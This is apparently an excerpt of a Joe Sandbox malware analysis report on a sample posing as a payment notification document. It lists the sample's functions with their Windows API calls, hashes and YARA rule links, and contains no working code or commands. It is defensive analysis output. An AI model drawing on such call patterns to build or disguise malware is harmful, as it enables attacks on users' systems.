Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
Instruction ID: a5a181798e08ac5fb962bdb22d444c5cb8e0699caccaaf92cd9bf1e41bec8d18
Opcode Fuzzy Hash: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
Instruction Fuzzy Hash: DA21A336621018EFDB258F94CC58EFA7BF9FF89360F048159F90987161C3319990EB60

Function 0094D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0097CB68), ref: 0094D2FB
GetLastError.KERNEL32 ref: 0094D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0094D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097CB68), ref: 0094D376

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
Instruction ID: a58cf01a0d4179cab1835d37d15f70d14eae0d63e11986a762f76b1fcee105d4
Opcode Fuzzy Hash: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
Instruction Fuzzy Hash: 3B21A17550A2019F8710DF28C88186A77E8FF96368F504A5DF4A9D32A1E730DE45CB93

Function 00941571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
Part of subcall function 00941014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
Part of subcall function 00941014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
Part of subcall function 00941014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009415BE
_memcmp.LIBVCRUNTIME ref: 009415E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00941617
HeapFree.KERNEL32(00000000), ref: 0094161E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
Instruction ID: 26fcaa3b8d33b97adfb13a1e8b815006dcf237504a5750bdc52120595d24c009
Opcode Fuzzy Hash: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
Instruction Fuzzy Hash: 56219A72E00209EFDF04DFA4C945FEEB7B8EF84344F098459E445AB241E730AA85DBA0

Function 00972782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0097280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00972840

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
Instruction ID: 230b6cb9ed3c17b6e12dbbb1dd08865fce5b84de65f712e9e01a0af57042a205
Opcode Fuzzy Hash: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
Instruction Fuzzy Hash: B621B632618511AFD7149B24C845FAA7B99FF86324F14815CF42ACB6D2C776FC82C791

Function 009478F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00948D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948D8C
Part of subcall function 00948D7D: lstrcpyW.KERNEL32(00000000,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00948DB2
Part of subcall function 00948D7D: lstrcmpiW.KERNEL32(00000000,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947923
lstrcpyW.KERNEL32(00000000,?,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947984

Strings

cdecl, xrefs: 0094797B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 436dde620dcfc4baf244b0b30a7aa0ba097da21b64da3e6f3d5e5e73197cc9aa
Instruction ID: b9fa31bf7f25157a83a17f49247fb541627d2f41856c1c83fa24383412860a2d
Opcode Fuzzy Hash: 436dde620dcfc4baf244b0b30a7aa0ba097da21b64da3e6f3d5e5e73197cc9aa
Instruction Fuzzy Hash: 7B11223A204346AFCB159F78C844E7BB7A9FF85390B40402AF906CB3A4EB319801D7A1

Function 00977CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00977D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00977D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00977D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095B7AD,00000000), ref: 00977D6B

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
Instruction ID: 3627afa4ac1c868c5480653976e53bc5e113838925bf1d049806bb73ebe4bc52
Opcode Fuzzy Hash: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
Instruction Fuzzy Hash: 8511D233118615AFCB208FA8DC04AA67BA8BF85370B158728F83DC72F0D7318960DB90

Function 00975660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009756BB
_wcslen.LIBCMT ref: 009756CD
_wcslen.LIBCMT ref: 009756D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
Instruction ID: efe0420b01e764d04e5245719990b3ce7cbbdf5bad128238048a8c26e3d98494
Opcode Fuzzy Hash: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
Instruction Fuzzy Hash: 1C11D373A006089ADF609F61CC85AEE77ACEF50764F51C42AFA1DD6081E7B4DA80CB60

Function 00911D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
Instruction ID: a8b39d6e58f755a5e5d27de30427aa0e6f47725530b29feac309c3bf7014be15
Opcode Fuzzy Hash: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
Instruction Fuzzy Hash: 100162B631961E7FF61126787CC1FA7671DDF813B8B340729F635551D2DB608C905160

Function 00941A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00941A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A8A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
Instruction ID: f5e2fff707b31e11993dae7f4fedebc56b1f99e6e61a399b769761c2b77bd29d
Opcode Fuzzy Hash: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
Instruction Fuzzy Hash: 5611397AD01219FFEF10DBA4CD85FADBB78EB08750F200495EA04B7290D671AE90DB94

Function 0094E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0094E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0094E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0094E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0094E24D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
Instruction ID: 8d1c0cae9255499256d2bcb6e09085ff97e937d7e828686580589d5aa7e7f862
Opcode Fuzzy Hash: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
Instruction Fuzzy Hash: 43112BB6918214BFC7019FA89C09EAF7FECAB45320F404329F825E3290D6B0CD0097A0

Function 0090D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0090CFF9,00000000,00000004,00000000), ref: 0090D218
GetLastError.KERNEL32 ref: 0090D224
__dosmaperr.LIBCMT ref: 0090D22B
ResumeThread.KERNEL32(00000000), ref: 0090D249

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
Instruction ID: a5ff52068f46bc04b82b962676f3263f122d43287ea961e30d86e02722f6d906
Opcode Fuzzy Hash: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
Instruction Fuzzy Hash: 1101D27680A208BFDB216BE9DC09BAE7A6DDFC1730F100219F939961D0CF718941D7A0

Function 00979EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

GetClientRect.USER32(?,?), ref: 00979F31
GetCursorPos.USER32(?), ref: 00979F3B
ScreenToClient.USER32(?,?), ref: 00979F46
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00979F7A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
Instruction ID: d841847a67108a2ea3112833f3fa147060fe00ce414e540553646dc330c17d71
Opcode Fuzzy Hash: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
Instruction Fuzzy Hash: 27114572A0461AEBDB10EFA8D889AEE77B8FB45311F408455F905E3140D730BE81DBA1

Function 008E600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
GetStockObject.GDI32(00000011), ref: 008E6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
Instruction ID: 969b4dd45832101dfc91160f4e4195fe40922a0464c90db3869f0ec15f0b6223
Opcode Fuzzy Hash: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
Instruction Fuzzy Hash: F711A1B3105958BFEF125F959C44EEA7B69FF293A4F000215FE04A2010D732ACA0EB90

Function 00903B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00903B56

Part of subcall function 00903AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00903AD2
Part of subcall function 00903AA3: ___AdjustPointer.LIBCMT ref: 00903AED

_UnwindNestedFrames.LIBCMT ref: 00903B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00903B7C
CallCatchBlock.LIBVCRUNTIME ref: 00903BA4

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: d9d04a05a558a5d4e87661a111384c4cb81ed2440adf1066f8ed85861bd27759
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 70012972100148BFDF126E95CC42EEB3B7EEF88758F048414FE48A6161C732E961EBA0

Function 00913073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008E13C6,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue), ref: 009130A5
GetLastError.KERNEL32(?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000,00000364,?,00912E46), ref: 009130B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000), ref: 009130BF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
Instruction ID: db82cb617d733fa7a5555d2a8378b7da7ad4efa039104b8ae15fd85f9583809e
Opcode Fuzzy Hash: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
Instruction Fuzzy Hash: C7012B7331962AABCB314B799C449A77BECAF49B71B118734F919E3140DB21DA81C7E0

Function 00947464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0094747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00947497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009474AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009474CA

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
Instruction ID: e9ab7488021e97411408b474f21860a289b0ef01eedf4359d7cba6696f790b83
Opcode Fuzzy Hash: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
Instruction Fuzzy Hash: 5E1161B52093199BE7208F94DC09FA2BBFDEB00B04F10896DA65AD6161D774E944DBA0

Function 0094B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B126

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
Instruction ID: e7bcf4dd96550cc6863fbca9265d4c7b83b437186a195b133a7c2326c6581659
Opcode Fuzzy Hash: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
Instruction Fuzzy Hash: 9A11AD71C0852CEBCF04AFE4E9A8AEEBB78FF4D311F004499D941B2285CB308650DB51

Function 00942DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

